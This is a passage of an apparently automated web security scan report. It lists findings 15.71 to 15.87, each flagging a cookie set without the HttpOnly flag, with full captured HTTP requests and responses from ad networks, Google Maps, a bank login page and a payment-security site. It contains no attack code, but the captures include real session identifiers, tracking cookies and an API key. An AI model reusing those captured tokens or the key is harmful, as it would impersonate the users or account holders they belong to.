Set-Cookie: bt=; Domain=.addthis.com; Expires=Mon, 25 Apr 2011 23:45:33 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Wed, 25 May 2011 23:45:33 GMT; Path=/
Set-Cookie: di=%7B%7D..1303775133.1FE|1303775133.60; Domain=.addthis.com; Expires=Wed, 24-Apr-2013 15:01:13 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Mon, 25 Apr 2011 23:45:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 25 Apr 2011 23:45:33 GMT
Connection: close

_ate.ad.hpr({"urls":["http://pixel.33across.com/ps/?pid=454&uid=4dab4fa85facd099","http://cspix.media6degrees.com/orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4dab4fa85facd099&curl=http%3a%2f%2
...[SNIP]...

15.71. http://firstdata.122.2o7.net/b/ss/firstdataprod/1/H.20.3/s97121651181951  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://firstdata.122.2o7.net
Path:   /b/ss/firstdataprod/1/H.20.3/s97121651181951

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/firstdataprod/1/H.20.3/s97121651181951?AQB=1&ndh=1&t=25/3/2011%2018%3A46%3A36%201%20300&ns=firstdata&pageName=en_us%3Ahome&g=http%3A//www.firstdata.com/en_us/home&cc=USD&v3=en_us%3Ahome&c50=en_us&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1208&bh=981&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: firstdata.122.2o7.net
Proxy-Connection: keep-alive
Referer: http://www.firstdata.com/en_us/home
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_kbuchzx7Ex60bodah=[CS]v4|26D5B4CB05010768-40000100203F0C39|4DAB6981[CE]; s_vi_efmdyx7Fx7Cdyx7Fc=[CS]v4|26D9C884851603AF-6000017820228B75|4DB39107[CE]; s_vi_kaquvg=[CS]v4|26D9C88705163068-600001A62005EACD|4DB3910D[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26DA3EC40516221C-6000018240050B56|4DB47D87[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26DA3EC40516221C-6000018240050B58|4DB47D87[CE]

Response

HTTP/1.1 302 Found
Date: Mon, 25 Apr 2011 23:46:27 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26DB03E9851D2780-60000129801B0427[CE]; Expires=Sat, 23 Apr 2016 23:46:27 GMT; Domain=firstdata.122.2o7.net; Path=/
Location: http://firstdata.122.2o7.net/b/ss/firstdataprod/1/H.20.3/s97121651181951?AQB=1&pccr=true&vidn=26DB03E9851D2780-60000129801B0427&&ndh=1&t=25/3/2011%2018%3A46%3A36%201%20300&ns=firstdata&pageName=en_us%3Ahome&g=http%3A//www.firstdata.com/en_us/home&cc=USD&v3=en_us%3Ahome&c50=en_us&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1208&bh=981&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1
X-C: ms-4.4.1
Expires: Sun, 24 Apr 2011 23:46:27 GMT
Last-Modified: Tue, 26 Apr 2011 23:46:27 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www276
Content-Length: 0
Content-Type: text/plain


15.72. http://freemarker.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://freemarker.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: freemarker.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.1.6
Set-Cookie: sid=o8emesk7arsbpfel9lptqllc70; expires=Wed, 27 Apr 2011 13:03:54 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="NOI COR NID ADMa DEVa PSAa PSDa STP NAV DEM STA PRE"
Vary: Accept-Encoding
Content-type: text/html
Connection: close
Date: Tue, 26 Apr 2011 13:03:54 GMT
Server: lighttpd
Content-Length: 825

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Frameset//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-frameset.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...

15.73. https://lct.salesforce.com/sfga.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://lct.salesforce.com
Path:   /sfga.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sfga.js HTTP/1.1
Host: lct.salesforce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Resin/3.1.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Type: text/javascript
Date: Tue, 26 Apr 2011 12:40:18 GMT
Connection: close
Set-Cookie: BIGipServerlct-pool=171237898.38687.0000; path=/
Content-Length: 9247

var _kd = document;
var _kdlh = _kd.location.href;
var _ki,_kq,_kv;
var _kwtlForm;
var _kretURL;
var _kwtlOnSubmit;
var _koid;

function __krand() {
return Math.round(Math.random() * 256).toString
...[SNIP]...

15.74. http://maps.google.com/maps  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://maps.google.com
Path:   /maps

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /maps?file=api&v=3&key=ABQIAAAAMzaxyPHBQRw4oILtM06ndBRGfDxDHatskTZIZdAqqgpnM33YYRQR2ZDYo85gatuUWMdauygvHxwpkw HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: maps.google.com

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
Set-Cookie: PREF=ID=95a21596c503a6a0:TM=1303779576:LM=1303779576:S=2ACplIH3-uZgJunm; expires=Thu, 25-Apr-2013 00:59:36 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Date: Tue, 26 Apr 2011 00:59:36 GMT
Server: mfe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Expires: Tue, 26 Apr 2011 00:59:36 GMT
Content-Length: 9977

var G_INCOMPAT = false;function GScript(src) {document.write('<' + 'script src="' + src + '"' +' type="text/javascript"><' + '/script>');}function GBrowserIsCompatible() {if (G_INCOMPAT) return false;
...[SNIP]...

15.75. http://maps.google.com/maps/vp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://maps.google.com
Path:   /maps/vp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /maps/vp?spn=0.026625,0.051498&z=13&key=ABQIAAAAMzaxyPHBQRw4oILtM06ndBRGfDxDHatskTZIZdAqqgpnM33YYRQR2ZDYo85gatuUWMdauygvHxwpkw&mapclient=jsapi&vp=39.149918,-119.765518 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: maps.google.com

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 01:01:21 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/javascript; charset=UTF-8
Set-Cookie: PREF=ID=f995d9314273e02a:TM=1303779681:LM=1303779681:S=wIvcG2ZPFmEtQJEY; expires=Thu, 25-Apr-2013 01:01:21 GMT; path=/; domain=.google.com
Set-Cookie: NID=46=M18OfOYkwV5omExAd4jEBn8dZCPACS1weJxsEJENY1GMISMbG8ZF4UO4bMM7-uRBdfSl1dnzWVLXLvPyJgoRQbylNH5f_80UnJyJnWa6UEiytQ1uuSkfs95lc1e-GL4k; expires=Wed, 26-Oct-2011 01:01:21 GMT; path=/; domain=.google.com; HttpOnly
X-Content-Type-Options: nosniff
Server: mfe
X-XSS-Protection: 1; mode=block
Content-Length: 1054

GAddCopyright("m","18298887027579452616",39.1366,-119.7913,39.1632,-119.7398,13,"Google",19,false);
window.GAppFeatures && window.GAppFeatures({cb:{bounds:[{s:39181175,w:-119838867,n:39198205,e:-11968
...[SNIP]...

15.76. http://mydownload.paretologic.safecart.com/pcha/homepage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mydownload.paretologic.safecart.com
Path:   /pcha/homepage

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pcha/homepage HTTP/1.1
Host: mydownload.paretologic.safecart.com
Proxy-Connection: keep-alive
Referer: http://www.cleanallspyware.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Date: Tue, 26 Apr 2011 13:54:46 GMT
Server: Apache
Set-Cookie: paretologic=4L4db6cea6aaf4b16-mydownload-rwire; expires=Mon, 18-Jul-2011 05:30:46 GMT; path=/; domain=.safecart.com
Location: http://www.pchealthadvisor.com
Vary: Accept-Encoding,User-Agent
SRV-ID: web04
Connection: close
Content-Type: text/html
Content-Length: 0


15.77. http://nuclearpesticide.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nuclearpesticide.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /?epl=6uDg8f0GtTBB04c13Nw5Y2TAIUmQUDhFchd_0fciLHGkFRPIpi8gG4Jpix0wCcvzJ5qDEQahgZLFrI5CphQZUysHDq10em_RGphrcn6kQE3JISFcR16KixcH4xgxowJDrvsks3GX6v1OBwDUozbUpqZpU08RlOkB1IZMbTLURhF1ACAQ3ue_AADgfwUAAECA2wgAAGTAIUlZUyZZQTE2aFpChgAAAPA HTTP/1.1
Host: nuclearpesticide.com
Proxy-Connection: keep-alive
Referer: http://nuclearpesticide.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: parkinglot=1

Response

HTTP/1.0 200 (OK)
Cache-Control: private, no-cache, must-revalidate
Pragma: no-cache
Server: Oversee Turing v1.0.0
Content-Type: text/html
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://www.dsnextgen.com/w3c/p3p.xml", CP="NOI DSP COR ADMa OUR NOR STA"
Set-Cookie: nuclearpesticide.com=search%3A0%7Cexitpop%3A0%7Clload%3A0%7Clvisit%3A1303825549%7Cclick%3A0%7Cblocked%3A0; path=/; expires=Wed, 27-Apr-2011 13:45:49 GMT
Set-Cookie: ident=search%3A0%7Cexitpop%3A0%7Clload%3A0%7Clvisit%3A1303825549%7Cclick%3A0%7Cblocked%3A0%7Ctoken%3Ayszswytswwytqwwv; path=/; expires=Wed, 27-Apr-2011 13:45:49 GMT
Set-Cookie: Spusr=a0015ac53514db6cc8d1a44; path=/; expires=Thu, 25-Apr-2013 13:45:49 GMT
Connection: Keep-Alive
Content-Length: 52421

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<!-- turing_cluster_prod -->
<html>
<head> <title> nuclearpesticide.com </title>
<meta http-equiv="Keywords
...[SNIP]...

15.78. https://olui2.fs.ml.com/login/login.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://olui2.fs.ml.com
Path:   /login/login.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /login/login.aspx?sgt=3&_tps=53e1d1d2ef5543dabbbb6e0d12a34f8b HTTP/1.1
Host: olui2.fs.ml.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:28:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
geh-svr-hex: 65680608
Set-Cookie: Bear=lOEt4KgcVyTNtOFnrwpDlr8rCGj6G8KxVhb/yhftyUA=; domain=.fs.ml.com; path=/
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 89522


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" >
<head lang="en-us"><met
...[SNIP]...

15.79. http://partners.genbook.com/MAPProc.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://partners.genbook.com
Path:   /MAPProc.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /MAPProc.aspx?&curUrl=about%3Ablank&refUrl=&c=16&sw=1920&sh=1200&winid=&ow=7&cookies=0 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: partners.genbook.com

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: /1pix.gif
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: 1V=1468622; expires=Wed, 27-Apr-2011 00:59:17 GMT; path=/
Set-Cookie: Source1=1000; expires=Thu, 26-May-2011 00:59:17 GMT; path=/
Set-Cookie: LS=1000; expires=Thu, 26-May-2011 00:59:17 GMT; path=/
X-Powered-By: ASP.NET
P3P: CP="NID DSP COR"
Date: Tue, 26 Apr 2011 00:59:17 GMT
X-Cnection: close
Content-Length: 128

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2f1pix.gif">here</a>.</h2>
</body></html>

15.80. http://pixel.33across.com/ps/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.33across.com
Path:   /ps/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ps/?pid=454&uid=4dab4fa85facd099 HTTP/1.1
Host: pixel.33across.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh39.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 33x_ps=u%3D7527692047%3As1%3D1303122295815%3Ats%3D1303122295815

Response

HTTP/1.1 200 OK
P3P: CP='NOI DSP COR NID PSA PSD OUR IND UNI COM NAV INT DEM STA'
Set-Cookie: 33x_ps=u%3D7527692047%3As1%3D1303122295815%3Ats%3D1303122295815; Domain=.33across.com; Expires=Tue, 24-Apr-2012 23:45:34 GMT; Path=/
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate
Expires: Thu, 01-Jan-70 00:00:01 GMT
X-33X-Status: 0
Content-Type: image/gif
Content-Length: 43
Date: Mon, 25 Apr 2011 23:45:33 GMT
Connection: close
Server: 33XG1

GIF89a.............!...
...,...........L..;

15.81. http://pixel.intellitxt.com/pixel.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.intellitxt.com
Path:   /pixel.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel.jsp?id=2773,2759,2761,2791&type=script&ipid=10143&sfid=0 HTTP/1.1
Host: pixel.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://spamlaws.us.intellitxt.com/iframescript.jsp?src=http%3A%2F%2Fpixel.intellitxt.com%2Fpixel.jsp%3Fid%3D2773%2C2759%2C2761%2C2791%26type%3Dscript%26ipid%3D10143%26sfid%3D0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7LgEAAAEvki8pzwA-

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Set-Cookie: VM_PIX=AQAAAAQAAArJAQAAAAEAAAEvki9eoAAACucBAAAAAQAAAS+SL16gAAAK1QEAAAABAAABL5IvXqAAAArHAQAAAAEAAAEvki9eoAAAAACIhXZ+; Domain=.intellitxt.com; Expires=Sat, 25-Jun-2011 14:21:08 GMT; Path=/
Content-Type: text/html
Content-Length: 1602
Date: Tue, 26 Apr 2011 14:21:08 GMT
Connection: close

(function(){try{var d=document;var u;u='http://segment-pixel.invitemedia.com/pixel?code=2773&partnerID=86&key=segment&returnType=js';if(navigator.appVersion.indexOf('MSIE')>=0 && ('complete'!=document
...[SNIP]...

15.82. http://pixel.quantserve.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel;r=1431229252;fpan=1;fpa=P0-633902152-1303780517296;ns=0;url=http%3A%2F%2Fwww.slaviks-blog.com%2F;ref=;ce=1;je=1;sr=1920x1200x16;enc=n;ogl=;dst=1;et=1303780517295;tzo=300;a=p-18-mFEk4J448M;labels=type.wporg HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://www.slaviks-blog.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4dab4f93-dea96-f475f-85ff7; d=EEIAFu8kjVmtjIMLyxuBAVcBzAaBsQDe0kykaNQqOxjlwfsgkgy4F8MIOBvVeCCuOB_xAA6JIAEC22ekMA

Response

HTTP/1.1 204 No Content
Connection: close
Set-Cookie: d=ECMAFu8kjVmtjIMLyxuBAVcBzQaB0QDe0kykaNQqOxjlwfsgkgy4F8MIOBvVeCCuOB_xAA6JIAEC22ekMA; expires=Mon, 25-Jul-2011 01:21:18 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV"
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Date: Tue, 26 Apr 2011 01:21:18 GMT
Server: QS


15.83. https://securitymetrics.com/sm/PANscan/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://securitymetrics.com
Path:   /sm/PANscan/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sm/PANscan/ HTTP/1.1
Host: securitymetrics.com
Connection: keep-alive
Referer: https://securitymetrics.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ask=6079AC2AB30386BACFA6271443B6ADF05606CD00A32572DEDFF96E6807D06F37DEDC73149F4231D58EA

Response

HTTP/1.1 200 OK
Set-Cookie: smsid=09f0146dbd92e08e1aac412eff15ddf24e6644aa; Path=/
Date: Tue, 26 Apr 2011 00:53:04 GMT
Server: SecurityMetrics/3.37.1j
Content-Length: 13228

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>SecurityMe
...[SNIP]...

15.84. https://securitymetrics.com/sm/determinesaq/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://securitymetrics.com
Path:   /sm/determinesaq/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /sm/determinesaq/ HTTP/1.1
Host: securitymetrics.com
Connection: keep-alive
Referer: https://securitymetrics.com/sm/determinesaq/storechd
Cache-Control: max-age=0
Origin: https://securitymetrics.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ask=6079AC2AB30386BACFA6271443B6ADF05606CD00A32572DEDFF96E6807D06F37DEDC73149F4231D58EA; smsid=868043594333d3db4590b2723770d82890feecf4
Content-Length: 25

page=storechd&storechd=no

Response

HTTP/1.1 303 See Other
Content-Type: text/html
Location: https://securitymetrics.com/sm/determinesaq/terminaltype
Set-Cookie: smsid=868043594333d3db4590b2723770d82890feecf4; Path=/
Content-Length: 0
Date: Tue, 26 Apr 2011 01:08:47 GMT
Server: SecurityMetrics/3.37.1j


15.85. https://securitymetrics.com/sm/determinesaq/reset  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://securitymetrics.com
Path:   /sm/determinesaq/reset

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sm/determinesaq/reset?resellerid= HTTP/1.1
Host: securitymetrics.com
Connection: keep-alive
Referer: https://securitymetrics.com/pricelist.adp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ask=6079AC2AB30386BACFA6271443B6ADF05606CD00A32572DEDFF96E6807D06F37DEDC73149F4231D58EA; smsid=868043594333d3db4590b2723770d82890feecf4

Response

HTTP/1.1 303 See Other
Content-Type: text/html
Location: https://securitymetrics.com/sm/determinesaq/storechd
Set-Cookie: smsid=868043594333d3db4590b2723770d82890feecf4; Path=/
Content-Length: 0
Date: Tue, 26 Apr 2011 01:08:31 GMT
Server: SecurityMetrics/3.37.1j


15.86. https://securitymetrics.com/sm/determinesaq/storechd  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://securitymetrics.com
Path:   /sm/determinesaq/storechd

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sm/determinesaq/storechd HTTP/1.1
Host: securitymetrics.com
Connection: keep-alive
Referer: https://securitymetrics.com/pricelist.adp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ask=6079AC2AB30386BACFA6271443B6ADF05606CD00A32572DEDFF96E6807D06F37DEDC73149F4231D58EA; smsid=868043594333d3db4590b2723770d82890feecf4

Response

HTTP/1.1 200 OK
Set-Cookie: smsid=868043594333d3db4590b2723770d82890feecf4; Path=/
Date: Tue, 26 Apr 2011 01:08:33 GMT
Server: SecurityMetrics/3.37.1j
Content-Length: 8168


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Deter
...[SNIP]...

15.87. https://securitymetrics.com/sm/determinesaq/terminaltype  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://securitymetrics.com
Path:   /sm/determinesaq/terminaltype

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sm/determinesaq/terminaltype HTTP/1.1
Host: securitymetrics.com
Connection: keep-alive
Referer: https://securitymetrics.com/sm/determinesaq/storechd
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
